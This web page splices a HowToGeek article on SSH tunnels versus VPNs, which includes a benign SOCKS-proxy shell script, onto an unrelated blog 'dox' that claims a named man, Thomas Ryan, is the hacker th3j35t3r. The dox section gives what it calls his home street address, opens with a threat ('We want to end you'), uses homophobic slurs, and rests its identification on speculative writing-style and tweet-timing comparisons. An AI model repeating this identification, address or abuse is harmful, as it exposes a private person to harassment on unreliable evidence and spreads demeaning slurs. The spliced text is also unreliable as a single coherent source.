SSH, which stands for “secure shell,” isn’t designed solely for forwarding network traffic. Generally, SSH is used to securely acquire and use a remote terminal session – but SSH has other uses. SSH also uses strong encryption, and you can set your SSH client to act as a SOCKS proxy. Once you have, you can configure applications on your computer – such as your web browser – to use the SOCKS proxy. The traffic enters the SOCKS proxy running on your local system and the SSH client forwards it through the SSH connection – this is known as SSH tunneling. This works similarly to browsing the web over a VPN – from the web server’s perspective, your traffic appears to be coming from the SSH server. The traffic between your computer and the SSH server is encrypted, so you can browse over an encrypted connection as you could with a VPN.

However, an SSH tunnel doesn’t offer all the benefits of a VPN. Unlike with a VPN, you must configure each application to use the SSH tunnel’s proxy. With a VPN, you’re assured that all traffic will be sent through the VPN – but you don’t have this assurance with an SSH tunnel. With a VPN, your operating system will behave as though you’re on the remote network – which means connecting to Windows networked file shares would be easy. It’s considerably more difficult with an SSH tunnel.
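As an added example (not code from the HowToGeek article), here is a small POSIX shell script that sets up the SSH SOCKS tunnel described above and builds in the two caveats that matter in practice: the `-D` listener must stay on loopback, and every application has to be pointed at the proxy and then verified, since nothing else goes through the tunnel. The server name, user and ports are placeholders.

```shell
#!/bin/sh
# Added example, not code from the article: an SSH tunnel used as a
# "poor man's VPN" via a local SOCKS proxy (ssh -D), plus the checks a
# defender wants around it. user@ssh.example.org and the ports are placeholders.

SSH_SERVER="${SSH_SERVER:-user@ssh.example.org}"   # placeholder server
SOCKS_BIND="${SOCKS_BIND:-127.0.0.1:1080}"          # where the SOCKS proxy listens

# Accept only a loopback bind for -D. Bound to 0.0.0.0 or *, the laptop
# becomes an open proxy for everyone on the same coffee-shop Wi-Fi, and
# their traffic would exit from your SSH server under your account.
check_bind_addr() {
    case "$1" in
        *:*) host="${1%:*}" ;;
        *)   return 0 ;;          # bare port: ssh defaults to loopback
    esac
    case "$host" in
        127.*|localhost|'[::1]') return 0 ;;
        *)                        return 1 ;;
    esac
}

# Print the ssh invocation: -N (no remote shell), -f (go to background once
# authenticated), -D (dynamic SOCKS forward) and ExitOnForwardFailure so a
# failed forward does not leave a session running with no tunnel at all.
ssh_socks_cmd() {
    check_bind_addr "$1" || { echo "refusing non-loopback bind: $1" >&2; return 1; }
    printf 'ssh -N -f -o ExitOnForwardFailure=yes -D %s %s\n' "$1" "$2"
}

# The tunnel only carries traffic from applications configured to use it
# (the article's main caveat). For tools that honour ALL_PROXY (curl among
# them), socks5h:// also hands DNS to the proxy so lookups do not leak.
# GUI apps need their own setting, e.g. Firefox: SOCKS v5 host 127.0.0.1,
# port 1080, with "Proxy DNS when using SOCKS v5" ticked.
proxy_env() {
    printf 'ALL_PROXY=socks5h://%s\n' "$1"
}

# Verification: fetch a "what is my IP" URL directly and through the proxy.
# Identical answers mean the application is not using the tunnel.
# Returns 0 if the tunnel is in use, 1 if not, 2 on a fetch error.
verify_tunnel() {
    direct=$(curl -s --max-time 10 "$1") || return 2
    via_proxy=$(curl -s --max-time 10 --socks5-hostname "$SOCKS_BIND" "$1") || return 2
    [ -n "$direct" ] && [ "$direct" != "$via_proxy" ]
}

# Run as: sh tunnel.sh run https://whatismyip.example/   (URL is a placeholder)
if [ "${1:-}" = "run" ]; then
    cmd=$(ssh_socks_cmd "$SOCKS_BIND" "$SSH_SERVER") || exit 1
    echo "starting: $cmd"
    ssh -N -f -o ExitOnForwardFailure=yes -D "$SOCKS_BIND" "$SSH_SERVER" || exit 1
    export "$(proxy_env "$SOCKS_BIND")"
    if verify_tunnel "$2"; then echo "tunnel in use"; else echo "tunnel NOT in use"; fi
fi
```

A browser that ignores `ALL_PROXY` will keep talking directly to the network even while the tunnel is up, which is exactly the assurance gap the article describes; `verify_tunnel` makes that visible per application.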

For more information about SSH tunnels, see this guide to creating an SSH tunnel on Windows with PuTTY. To create an SSH tunnel on Linux, see our list of cool things you can do with an SSH server.

Which Is More Secure?

If you’re worried about which is more secure for business use, the answer is clearly a VPN — you can force all network traffic on the system through it. However, if you just want an encrypted connection to browse the web with from public Wi-Fi networks in coffee shops and airports, a VPN and SSH server both have strong encryption that will serve you well.

There are other considerations, too. Novice users can easily connect to a VPN, but setting up a VPN server is a more complex process. SSH tunnels are more daunting to novice users, but setting up an SSH server is simpler – in fact, many people will already have an SSH server that they access remotely. If you already have access to an SSH server, it’s much easier to use it as an SSH tunnel than it is to set up a VPN server. For this reason, SSH tunnels have been dubbed a “poor man’s VPN.”

Businesses looking for more robust networking will want to invest in a VPN. On the other hand, if you’re a geek with access to an SSH server, an SSH tunnel is an easy way to encrypt and tunnel network traffic – and the encryption is just as good as a VPN’s encryption.

 

SOURCE: HowToGeek.com

#InfoSec: If it walks like th3j35t3r and talks like th3j35t3r, its probably TomRyanBlog


UPDATE: Our hero Jake Davis provided some interesting commentary on this subject recently:

I remember seeing IRC logs of you and LulzSec dissing The Jester and saying his tool “XerXeS” is just SlowLoris with Tor… but how did you guys come to this conclusion? How can this be mitigated if his attacks appear to come from so many exit nodes? Just block all Tor exit nodes? I don’t wanna. :(

“I have no idea how XerXeS or any other DDoS tool actually works, all I know is that the person or people running the character known as The Jester have been doing it successfully for many years with absolutely zero discrepancies, arrests or suspensions. I think that it’s incredibly impressive that The Jester has stuck to the courage of his/her/their convictions for such a large period of time, even though I disagree with some of the political views expressed. I’m a big fan of facilitating alternative realities and The Jester brings us into another world with many sophisticated layers that often make us forget that it’s just a twitter account and a blog, which is a talent few people have. I find the construction of the persona at a granular level far more admirable than the hacking itself, which I obviously don’t approve of.” – via http://ask.fm/DoubleJake

 

DecryptedMatrix gives voice to PiraX

Hello there, th3j35t3r. We would also like to welcome our fellow Anons, bloggers, and those simply interested in a cyber-culture controversy spanning over two years. We are sure you know why we have called you here. Your recent online behavior has been rather strange, to say the least. We are here for one reason: We want to end you.

We would like to start first by making you comfortable. No more quasi-anonymous pseudonym mumbo-jumbo. Your name is Thomas so we will call you by the name you were given by your mother. We know your name because it was confirmed over a month ago with the following Pastebin paste: http://pastebin.com/A5iiTAJS (PiraX Dox continued after paste)
________________________________________________________________________

Q: Are Thomas Ryan and th3j35t3r one and the same person?

tl;dr: Yes. You fucking bet they are. In the words of Oscar Wilde, however, ‘The truth is rarely pure and never simple.’ Thus, if you want the full, uncensored dox on th3j35t3r, you’re going to have to bear with me for the next ten minutes as I tear apart his tissue of lies and disinformation.

Now concentrate, cos here comes the proof…

Warning: Long dox is looooooooong. I trust it will prove to be an enlightening read however, not least for Mr Thomas Ryan of 86 Amber Street, Staten Island NY.


SEE TOM RYAN AS JESTER at DEFCON 19

Filmed at Defcon after observing Tom Ryan post and photograph a note outside the vendor room signed “J.” This photo was tweeted from @th3j35t3r twitter within moments, as was the following: https://i.imgur.com/axth3.jpg
Note the “Black cell paintball” logo on the shirt. BCP is the name of Tom’s Paintball team. Tom hangs out on PBnation.com with a kid called j35t3r, which is the likely source for the name, and the first of many plagiarisms. NOT SUSPICIOUS AT ALL, folks. Nor is it suspicious that the ridiculous attempts to smear me as a secret blackhat/anon/whatever over the last year all come from the same group of six people connected to Tom. The other partner is tentatively identified, but that’s a story for later.

**********

Among the 9,000 names to have been linked with @th3j35t3r, one that keeps cropping up is that of @TomRyanBlog. The dox has been denied by th3j35t3r, but then Sabu repeatedly denied that he was Hector Monsegur, and we all know how that one ended up…

While many Anons have been focused on reverse DNS lookups, port scanning and conventional doxing methods to unmask Jester, no one seems to have tried a simpler technique: writing analysis.

If Tom Ryan (TR) and Jester (J) are one and the same person, it should be easy to tell. They’ve written 3,000 tweets between them. Even the l33t3st of the l33t would struggle to convincingly maintain two separate writing styles over the course of thousands of tweets and numerous blog posts.

For those who are new to the party, here’s an overview of what we know about TR and J:

Both are conservative, right-wing and love their precious military. Both hate #OWS, Wikileaks, Manning and are obsessed with unmasking Anons. Both are fixated with Sabu (still!), Team Pois0n and Cabin Cr3w. Both enjoy love-ins with @AsherahResearch, @AnonymousDown and all the usual trolls.  In short, they’re both neo-con faggots. But are they one and the same faggot, or are they separate fags who happen to be pursuing identical vendettas?

Before we get bogged down in analyzing their writing styles, here’s some lighter tit-bits to get things kick-started:

1. Last year, TR and J both attended Hacker Halted in Miami and DEFCON in Nevada. Based on what we know of the pair’s political leanings and infosec knowledge, that alone automatically narrows them down to less than 5,000 possible suspects.

2. TR and J both like sushi (a trifling detail, but one that helps build a picture of their personalities). TR: “@p0isAn0N not going to the right Pizzaria. If you are in Boston you should be going to BoLoCo for Burritos anyway. And Duozo for Sushi.”
J: “#hackerhalted delegates … Stay clear of Cafe Bastille. Great sushi at Bali Cafe though… Stayin frosty.”

3. Tom Ryan has form for assuming false identities – such as ‘Robin Sage’. See here for the full story:
http://www.darkreading.com/insider-threat/167801100/security/privacy/225702468/index.html

INTERESTING FACT: @RobinSage joined Twitter on 26th December 2009 – exactly one week after @th3j35t3r joined.

The connection between Tom Ryan, Robin Sage and Jester was first brought to my attention by this tweet from @LulzKitten on 29th March 2012:

“Okay, let’s cut the crap, hello @Th3J35t3r aka @TomRyanBlog aka robinsage. Game over. Was fun, at least sometimes. Next nemesis, plox!”
(Note: Direct links to all tweets quoted in this dox can be found cited in the conclusion.) After reading LulzKitten’s tweet, I cast a casual glance over the Twitter feeds of Tom Ryan and Jester, and instantly noticed some similarities between the pair.

The most damning evidence linking TR and J – the smoking gun – will be presented towards the end of this dox, if you can wait that long, but first, let’s perform some writing analysis. After all, if TR and J are the same person, there ought to be some similarities in their writing styles, surely? You betcha. Here we go then:

Anyone who’s followed J on Twitter and read his blog may have noticed that he has a very distinctive writing style. Let’s pick through some of Jester’s trademark phrases, and then see if we can spot them recurring in TR’s tweets:

4. ‘Hmmmm’. Jester likes to say ‘Hmmm’, ‘Errr’ and ‘Ahemmm’ a lot. In fact he likes to say them so much that he even uses these filler phrases in his blog titles, as well as littering his tweets with them. Here are some examples:

5th April: “@deftpunkz – umm holy shit. I dont know what to say guys, errrr thanks, i think? -”

4th April: “Al-Qaida ‘blacked out’ on the internet (effectively switched off) >>> http://timesofindia.indiatimes.com/tech/news/internet/Al-Qaida-blacked-out-on-internet/articleshow/12529550.cms #infosec #saladin #ahemm”

3rd April: “Now…… imagine…… how many of those listed in my last, were ummmmmm – on the ‘shit list’ – just a thought??? #anonymous”

27th Feb: “#Wikileaks & #anonymous dump 5 million #strafor internal emails obtained by #anonymous last Dec..umm this right here…”

21st March: “Anti-Anonymous hacker threatens to expose them (via MSNBC) http://www.msnbc.com/id/46716942 <<< ummm too late. #military #cyber #security #infosec #DoD”

15th Nov, WordPress blog title: “Occupy Wall Street?? 99%?? Ummm.”

Hmmm, I wonder if Tom Ryan also likes to say ‘Hmmm’? Let’s take a look:

10th April: “How To Prevent Data Leaks From Happening To Your Organization http://zite.to/HCucc8 hmmm…how do you prevent the carbon factor from leaking?”

6th April: “Hmmm So @AnonW0rmer is arrested at 10:30 http://j.mp/HiAASP tweets till 3:32, @ItsKahuna disappears @AnonymousIRC disappears for 4 Day >>>”

15th March: “CSI tonight has a scent of Anonymous. Anthropology professor teaching about Hactivism. Hmmm who came it be?”

11th March: “@kennethlipp hhhmmmm do you think any anons donated money to his reelection campaign?”

7th March: “@CryptKper @v0ld4m0rt you are spot on! Who could that have been? Hmmmmm”

16th Feb: “@agentdarkapple Interesting! Hmmm! I can see why you think I would be L and you would be N. L doesn’t smile like me”

OK, that’s enough Hmming – on to point #5: ‘Tick tock’. Jester loves to say ‘Tick tock’ – it’s one of his favorite phrases. Look:

6th March: “From 3.5 months ago: https://th3j35t3r.wordpress.com/2011/11/19/if-i-am-wrong-ill-say-im-wrong-heres-my-apology/ …… from 1 hour ago …. http://www.foxnews.com/scitech/2012/03/06/hacking-group-lulzsec-swept-up-by-law-enforcement/ tick tock toldya.”

3rd August: “’RT @anonymousabu: @hjjrc @SparkyBlaze Your problem is with a ghost. Someone you can neither find nor stop.’ << you have same problem. #tick”

27th July: “@anonymousabu tick tock.”

24th July: “TICK TOCK. #toldyac2dc37a7d9d3238877a127f2d5171c9d”

21st June: “Tickety Tock…..”

25th June blog entitled LulzSec’s Cloudflare Configuration: “Tickety Tock Tock.”

Why, isn’t that a quirky little phrase? I wonder if Captain Hook – sorry, Tom Ryan – also uses the same terminology. Oh, what’s this we have here from 27th Feb?

“#Anonymous I am working on my big release. Hmmmm who should it goto? Tick Tock”

There’s even a ‘Hmmmm’ thrown in for good measure. How Jester-esque!

With a nudge and a wink, we move onto #6: Jester loves nothing more than to sign off his tweets with a sly wink. Just like so:

28th March: “@wwpinc – just in case you were not aware: >>>https://th3j35t3r.wordpress.com/support/ <<< – keep up the great work ;-) Peace. #pgr #wwp#woundedwarrior”

26th March: “Al-Qaida forums crippled in suspected cyber intervention http://j.mp/GSd8ih << bad things happen to bad people, apparently ;-) #infosec”

11th March: “@RepDanGordon @FBIPressOffice I merely stated u were on the list, u seem awful jittery. U need to calm down >> ;-)”

2nd Oct: “RT: @mach2600 @th3j35t3r It’s wobbling … up, down, up, down… <<< gotta love NGINX – always somethin huh ;-)”

16th June: “standby for supporting clarification on http://th3j35t3r.wordpress.com/2011/06/16/quick-n-dirty-just-for-clarification/?utm_source=Jesters+Court+Blog&utm_medium=twitter – close ya eyes if ya already saw it yesterday. ;-)”

2nd June: “http://www.foxnews.com/scitech/2011/06/02/pentagon-has-secret-list-cyber-weapons/ – #justsayin ;-) #oorah”

Now it’s TR’s turn to have a sly wink:

5th April: “The beauty of data-mining in a social world, I don’t need to be connected to you, so you can’t block me. You just need to be on my radar ;-)”

5th April: “@x_ryujin_x @render64 @bitchiest @kalyptonet think of what full dox did for Sabu ;-)”

4th April: “@LauraWalkerKC @BobbyCarbon @NavySEALsORG @Packetknife @HonorThem You should record it ;-)”

14th March: “To Geeks & Nerds 3/14 is known as Pi Day http://www.youtube.com/watch?v=JTZtuMdkUks To Horny Men it’s known as Steak & Blow Job Day! The GF reminded me ;-)”

13th March: “@JackalAnon warned #Anonymous 2 Days Ago about OAuth and Apps. We’ve warned you about TOR. ;-)”

14th Feb: “Why I’m Glad My Boyfriend Isn’t On Facebook – Forbes http://j.mp/z9XNrP by @kashhill | Leaving Facebook made me never want to go back ;-)”

Next up, it’s similarity #7 – ‘Stay Frosty’. This, Jester’s catchiest of catch-phrases, crops up all over his tweets:

2nd April: “http://www.cbsnews.com/2100-202_162-20075647.html <<< still going on about this? Stay frosty and have a Cupcake??”

10th Nov: “#stayfrosty -Word of advice 2 @barrettbrownlol: Just because you’re paranoid doesn’t mean they aren’t out to get you. >”

26th Oct: “#hackerhalted left a little something under the projector in Alhambra SCADA room. Tweet me a photo of what’s there. #stayfrosty”

25th Oct: “#hackerhalted delegates … Stay clear of Cafe Bastille. Great sushi at Bali Cafe though… Stayin frosty.”

Now let’s see what Monsieur Ryan has to say for himself:

10th April: “Iran plans to unplug the Internet, launch its own “clean” alternative http://zite.to/Iqm1Ba #anonymous @CabinCr3w Stay Frosty ;-)”

16th March: “@testeux1 Class on Strategy? I can teach one at The Spy Museum in DC @wikileaks @revmagdalen @AnonymousIRC @YourAnonNews Stay Frosty ;-)”

13th March: “#Anonymous in your time of fear those of you that have used delete.twitlan / tweeteraser / twitwipe A Special Thank You!!! Stay Frosty! ;-)”

13th March: “@jackie_singh @krypt3ia I was promoted today to Brigadier General Packet of The Cyber Brigade @th3j35t3r now reports to me! Stay Frosty ;-)”

12th March: “Finch + Reese = ;-) …. Stay Frosty & Watch Your 6!”

Hang on a sec, isn’t it a bit, well, *obvious* for Tom Ryan to be liberally dropping Jester’s favorite catchphrase into his tweets? Yep, you’re right – it’s very obvious. But here’s the thing: the AntiSec dox that named Jester as Tom Ryan landed in Pastebin on 11th March. Notice how TR deliberately goes out of his way to play up to the ‘Stay Frosty’ caricature in the ensuing days? That’s because he realizes that the more he pretends to be Jester, the more people will be inclined to write him off as just another Jester wannabe. For another example of this tactic, here’s how J tweets every time he downs a Muslim extremist website:

1st March: “http://www.rjfront.info – TANGO DOWN. Temporarily. For enabling recruitment, & co-ordination of jihadist terror cells via web.”

1st March: “http://www.atahadi.com – TANGO DOWN. Temporarily. For online incitement to cause young muslims to carry out acts of violent jihad.”

Exactly one month later, on 1st April, TR tweets the following:

“www.ic3 .gov – TANGO DOWN. Temporarily. For not doing your job, & not arresting #Anonymous”

And: “www.fbi .gov – TANGO DOWN. Temporarily. For enabling recruitment, & co-ordination of #Anonymous via web.”

At this point, obvious troll is obvious – within days of LulzKitten’s tweet linking Tom Ryan and Jester, TR goes out of his way to tweet ‘Stay Frostys’, Jester winks and ‘TANGO DOWN’s. To give him credit, it’s a pretty smart way to make people think you’re nothing more than a Jester fanboy. Sadly for Thomas, it’s too late; the evidence linking Tom Ryan to Jester began from the moment TR began tweeting in January 2012. Prior to AntiSec dropping Jester’s dox on 11th March, Tom Ryan had only tweeted ‘Stay Frosty’ twice in three months. Immediately afterward, he tweets it five times in four days – complete with the Jester’s trademark wink.

So does that mean that all of the foregoing information is part of an elaborate ploy, cooked up by Tom Ryan and Jester, to obfuscate the identity of the real Jester? In the case of the ‘Stay Frostys’ and the ‘TANGO DOWN’s, yes, it probably is. Thankfully, there are dozens of other textual similarities between the pair – similarities that are too subtle to be part of a pre-planned disinformation campaign.

Which leads nicely on to point #8: ‘Much’. Note the phrase that appears in the following tweets from Jester:

18th June: “http://www.techhomethebacon.com/news/hacking-infosec/th3j35t3r-links-nakomis-to-lulzsec-group-cover-up-ensues.html – backpeddaling much? Hacked? lol. -”

18th June: “Back-pedalling much? https://twitter.com/#!/Anonakomis/status/81862870664609792 #js”

August 21st WordPress blog entitled If ya can’t beat em, make some shit up??? LMAO!: “coincidence much?” “projection much??”

I wonder if TR ever lets slip a similar phrase? Oh, what’s this?

14th March: “@kaepora Nadim, delete much? You’re in the snitch crew? https://twitter.com/#!/realytcracker/status/143411708369715201 of @Anonymousabu & @ioerror”

Coincidence much?

#9: Jester loves to leave trailing dots in his tweets:

9th April: “<<< drums fingers on desk….”

3rd April: “Now…… imagine…… how many of those listed in my last, were ummmmmm – on the ‘shit list’ – just a thought??? #anonymous”

22nd November: “AFK…….”

He also uses trailing dots when he’s typing live into Notepad in this YouTube video: http://www.youtube.com/watch?v=WeO44IWlkfU

More of Jester’s ‘trailing dots’ tweets are cited at the end of this dox. Now it’s TR’s turn to deploy this tactic:

6th April: “@kennethlipp that’s how it went down with Barrett Brown too. Remember they ended up going to every address for him….according to him”

5th April: “@Bitchiest @KalyptoNet @TomRyanBlog The Secretary disavows this tweet and everybody in it…”

4th April: “#Anonymous ever wonder why certain high ups in your collective are never V& …. Look at cases that never went to court & who has relocated”

Again, more examples of this idiosyncrasy can be found cited at the end of this dox, as well as liberally scattered throughout Tom Ryan’s Twitter feed.

#10: Arrows. Jester loves to use arrows to break up words in his tweets, <<just like this>>:

9th April: “”@VizFoSho: @th3j35t3r dun goofed http://www.picvalley.net/u/1980/407013641289457528133400533586itAR4VE93lm7DAkGd2.PNG @RepDan_Gordon” <<< Shit ya got me! What am I to do? Btw now I am near north pole.”

28th March: “@wwpinc – just in case you were not aware: >>> https://th3j35t3r.wordpress.com/support/ <<< – keep up the great work ;-) Peace. #pgr #wwp #woundedwarrior”

Now TR:

6th April: “Hmmm So @AnonW0rmer is arrested at 10:30 http://j.mp/HiAASP tweets till 3:32, @ItsKahuna disappears @AnonymousIRC disappears for 4 Day >>>”

13th March: “Don’t know whether to laugh or feel bad but come on: (compatible;+MSIE+6.0;+Windows+98;+Win+9x4.90) << In This Day An Age??”

9th March: “conspiracy 1. a plan or agreement to carry out an illegal or harmful act 2. the act of making such plans >> aka #Anonymous Ops #justsayin<<”

Glance through their tweets and you’ll see that J and TR use <<arrows>> all the time.

#10: UPPER CASE. Compare the tweets of J and TR and you’ll notice that they both love to highlight single words in capitals. Jester first:

9th April: “WARNING: Tweeps in mirror are closer than they appear.”

18th March: “I’m still asked WHY I hit #wikileaks, skip to 28mins 12secs & Major TJ O’Connor abt sums it up http://www.youtube.com/watch?v=buY3I4PkK98 << worth watching it all.”

11th March: “@repdangordon be advised, when u file ur complaint to feds, they ARE going need ur cell for forensics to determine IF I hacked u at all ;-(”

Tom Ryan’s turn:

5th April: “INTERESTING: What is this ugly brown stain on a Key Member of Anonymous’ back? I need to do my cropping for the new site launch. Peace!”

5th April: “#Anonymous why so many military and sovereign citizen connections? GOD I aam glad I took 2 weeks to lay low.”

4th April: “@MaxVenator Too cold and windy for the Hamptons BUT you gave me a good idea. Maybe we can turn Plum Island into a resort for #Anonymous”

Jester and Tom Ryan both use this technique DOZENS of times in their tweets.

#11 features a more subtle similarity between our Jester and our Clown:

Jester, 21st August: “If ya can’t beat em, make some shit up??? LMAO! -”

TR, 16th March: “@exiledsurfer ROFLMAO! Reminds me of being in Bahrain & Abu Dhabi hearing Garth Brooks “Friends in Low Places””

Jester and Thomas don’t always laugh their asses off, but when they do, you can bet it’s in upper case with an exclamation mark at the end. (More examples, as always, are cited in the conclusion of this dox.)

#12: J and TR aren’t very good at spelling. They struggle especially with words such as ‘its’ and ‘it’s’. Jester’s tweets aren’t usually too bad for typos, as he doesn’t rush them (because he knows they will be analyzed by a wide range of foes who might otherwise have cause to mock him for his poor grammar). He also has the autocorrect on his Android phone to help him. However, he still struggles with those pesky apostrophes that autocorrect can’t pick up, especially when he tweets from his desktop:

6th March: “WTF is Wikileaks gonna do now it’s source of illegally obtained private info (anon/lulz) has had it’s head & skillset removed? #2birds1Stone”

21st June: “Seems almost as if ‘somebody’ doesn’t want you to see my last link – here’s a pastebin of it’s content.”

In his WordPress blog however, Jester often mixes up his apostrophes, especially in words such as ‘its’:

“With Netcat listening at the other end for incoming connections, you can configure it to execute it’s own script when it receives a connection for example to send a Message of the Day to the connecting device, you would run netcat like this on your server”

Watch his two YouTube videos (links cited at the end) in which he types directly into Notepad and you’ll see he also fails to put apostrophes into words such as ‘lets’, ‘its’ and ‘Thats’. 2:20 into his XerXes DoS Attack video and you’ll see that the text displayed on Jester’s self-designed software also contains typos: ‘SUCCESFULLY’ should have two ‘s’ in the middle, while at 2:29, you’ll see that ‘Secured’ has also been spelt wrongly. At 6:52 he also makes the same error when typing into Notepad.

Does Tom Ryan fare any better in the spelling stakes? No. In fact he’s even worse when it comes to tweeting typos. That’s because Thomas tweets ten times as frequently as Jester, tweets more hastily (lots of rushed replies to his Twitter buddies) and because he writes the tweets on his Mac, which doesn’t autocorrect his mistakes. Look:

4th April: “@AdrianChen surprised your not all over the @Anonw0rmer arrest and shortly after the disappearance of @itskahuna”

5th April: “To those I owe something too, It’s on it’s way!”

30th March: “RED ALERT: tomorrow is #NoClick31 just as a precaution. Rumor has it #Anonymous is using it’s Porn Bots for #opBlackout click to DDOS attack”

Wanna see more? Just read his tweets.

OK, we’ve almost reached the really juicy stuff linking Jester and Thomas, but first there are a couple more writing similarities to rattle through:

#13: J and TR write numbers numerically rather than alphabetically – even when composing short tweets.

Jester, 28th Feb: “4 more Anons V&’ed http://tinyurl.com/8a2g5k5 #anonymous”

10th Nov: “#stayfrosty -Word of advice 2 @barrettbrownlol: Just because you’re paranoid doesn’t mean they aren’t out to get you. >”

27th November: “#saladin (XerXes bro)- ‘the best weapon is the one u never have 2 fire…I prefer the weapon u only need 2 fire once.’”

20th July: “Never saw a wild thing sorry 4 itself. Small bird drop frozen dead from bough without ever having felt sorry 4 itself.”

TR – yep, you’ve guessed it – does exactly the same:

5th April: “@ohmylulz will with 2 False Positives. @missarahnicole @AsherahResearch”

4th April: “Ruh roh! A certain key #Anonymous member disappears for 4 days then reappears. We know what that means.”

3rd April: “@Ihazcandy I should start digging into them. Since I have 2 weeks of downtime.”

OK, moving on (we’re nearly done, I promise) to #14: Hashtags. If you go to tweetstats.com and enter TR and J’s twitter names into separate windows, a series of pretty graphs will be generated that will allow you to compare their tweeting patterns. You’ll notice that they tweet from separate devices, to eliminate the possibility of accidentally tweeting to the wrong account – Tom Ryan likes to keep his iPhone in one pocket and his Android in the other for when he’s playing Jester. Click on the Tweet Cloud tab at the top of the page and you’ll be able to view the most frequent hashtags used by both parties. Not too surprisingly, given their obsession with all things masked, it’s #anonymous. There are also three other hashtags that the pair use prominently however – #fail, #justsayin and #infosec. The latter one is understandable, but the other two? Interesting. Let’s see some #fail and #justsayin in action, starting with Jester:

3rd November: “#opcartel #anonymous You should really listen to what this man has to say. Remember your track record is full of #fail”

15th August: “@anonymousabu U R #fail. U hurt who u claim to fight for (lol), u have agenda < http://reg.cx/1Qps & the agenda is >”

14th August: “So @landrytom u finally got ur mention. Damn u zeroed my ‘xchat’? Please all check out his timeline. Then ask him where is the pwnage? #fail”

29th July: “1st up: My doxing. That’s a #fail. (again) I have never been Ryan Berg, John Willander, Robin Jackson, Anthony Freed, Beau Colvin. #opFrosty”

2nd June: “http://www.foxnews.com/scitech/2011/06/02/pentagon-has-secret-list-cyber-weapons/ – #justsayin ;-) #oorah”

Now it’s Tom Ryan’s turn to #Fail (#Justsayin):

5th April: “@agentdarkapple @AsherahResearch she’s definitely is no @elizadushku , Mila Kunis or Megan Ackerman. So she’s a #Fail”

2nd April: “@subverzo TY for verifying 2 alternate personas yours & @CrappyTires . FYI, Everyone in the CT world knows Shumukh al-Islam Forum. #FAIL”

9th March: “@AnonymousIRC you do know they rig cases to #FAIL inorder to capture bigger FISH ….. Right? @atopiary @lolspoon @AnonymouSabu”

9th Feb: “Dangerous Tweets: Arrested, fined in 140 characters or less http://j.mp/yWAV4G << What ever happened to contextual analysis? another #Fail” (Note the classic Jester-style arrows used in this tweet as well.)

10th March: “#anonymous remember threatening people or family members can lead to several crimes. If they are harmed it becomes much worse. #justsayin”

9th March: “conspiracy 1. a plan or agreement to carry out an illegal or harmful act 2. the act of making such plans >> aka #Anonymous Ops #justsayin<<”

Plenty more examples, as always, can be found cited in the footnotes at the end of this dox.

OK, here endeth the writing analysis lesson. Thank you for your patience :) It would be fair to say we’ve established that Jester and Tom Ryan tweet in an uncannily similar manner, but that’s not all. Now we get on to the really good shit…

#15: Tweet times. Using tweetstats.com, it’s possible to compare the times at which J and TR tweet. A quick glance at their respective Tweet Density graphs reveals a similar pattern: neither of them tweets between 3am and 7am EST: they’re both East coast bitches. Interesting.

#16: A few days ago, @VizFoSho tweeted the following image:

http://www.picvalley.net/u/1980/407013641289457528133400533586itAR4VE93lm7DAkGd2.PNG

It depicts two Jester tweets from 7th April, both geo-stamped with Atlantic City, NJ on them. Atlantic city is within 150 miles of NY, where Tom Ryan lives. On 26th March, Jester also posted a single tweet from New York: https://twitter.com/#!/th3j35t3r/status/184333789697282048

Normally, Jester’s tweets don’t reveal his location. Up until April 2012, there had only been four instances in which Jester’s tweets revealed his location – and two of those occurred when he was at DEFCON Nevada and Hacker Halted in Miami, occasions when he was undoubtedly eager to reveal his location in order to prove he was in attendance. Were the New York and Atlantic City revelations accidental (Tor for Android not working properly perhaps?) or was Jester trying to provide more misinformation?

After @VizFoSho pointed out the NJ link (the NY slip-up had gone unnoticed), Jester went out of his way to post two tweets from ridiculously exotic locations – Cape Town on 9th April and then Hawaii on 10th April:

https://twitter.com/#!/th3j35t3r/status/189464600318722049
https://twitter.com/#!/th3j35t3r/status/189464600318722049 “The octopus here is amazing. Dontcha think :-)”

Jester has never previously switched his location to a far-flung location purely for the lulz. Why should he suddenly be trying so hard now that he’s been identified as an East coast slacker? If he’s not Tom Ryan, why should he be bothered if people think he’s from NJ or NY?

On 4th April, Jester made the second of his two Atlantic City tweets at 4:03pm. 11 minutes earlier, Tom Ryan had also posted a tweet. For the next 48 hours, neither account tweeted – a rare occurrence, especially for TR who averages over 30 tweets a day. Enjoying a couple of days in Atlantic City playing the slots, perhaps?

Here are the 4th April tweets from both parties:

https://twitter.com/#!/th3j35t3r/status/187610604314431488

https://twitter.com/#!/th3j35t3r/status/187616455762784257

https://twitter.com/#!/TomRyanBlog/status/187612824187584512

Curiouser and curiouser. But that’s not all. On 23rd March, TR tweets:

“Headed to South Beach to enjoy this great weather! Later Tweeps!”

https://twitter.com/#!/TomRyanBlog/status/183199880922148864

For the next 48 hours, Jester and Tom Ryan are both absent from Twitter.

A month earlier, on 17th February, the same thing happens after TR tweets:

“Off the Grid for a few days ! Have a great 3 day weekend!”

https://twitter.com/#%21/TomRyanBlog/status/170321854723129344

For the next four days, neither party tweets. The first person to break the Twitter silence is Jester, and it’s another rare instance of him revealing his location – Arlington VA.

https://twitter.com/#!/th3j35t3r/status/172077181051219968

Enjoy your three-day weekend, Thomas?

I stated earlier that until April Jester had never previously switched his location to a far-flung country, but I lied – there IS actually one occasion when Jester appeared to be out of the country. On 25th January, he posted the following tweet:

“To all who have DM’ed asking after my whereabouts & welfare…am safe & limbering up. It’s a brave new year. TY 4 support. Stay Frosty.”

https://twitter.com/#!/th3j35t3r/status/162261098035298304

His alleged location? Brescia, Italy. What about Thomas Ryan – what was he up to around this time? Well here’s the thing: between 23rd and 26th January, TR (a man who likes to tweet all day, erryday) doesn’t post a single tweet. Too busy enjoying the bruschetta, washed down with a bottle of Barolo perhaps?

A final word on correlating Twitter times before we move onto our final two points: take a look at the timeline for Jester and Tom Ryan’s tweets. Notice how they often tweet at almost exactly the same time as one another? For example, take Tuesday 10th April. After two hours without activity from either account, Thomas posts the following at 15:30pm:

“Now I feel really special. Someone created a hidden stream about me and monitors it.”

One minute later, at 15:31, Jester tweets “@alemarahweb – http://www.alemara1.com – TANGO DOWN – أنا كنت”

Observe any two Twitter accounts for long enough and you’ll find timing coincidences of course. However, compare Jester and Tom Ryan’s accounts on any given day and you’ll spot a predictable pattern: they always broadly correlate, i.e. there is a short burst of tweets, followed by a 45 minute break while Jester/Ryan goes for a wank or to chow down some beef jerky.

Right, two more points to raise and then I’ll leave you in peace:

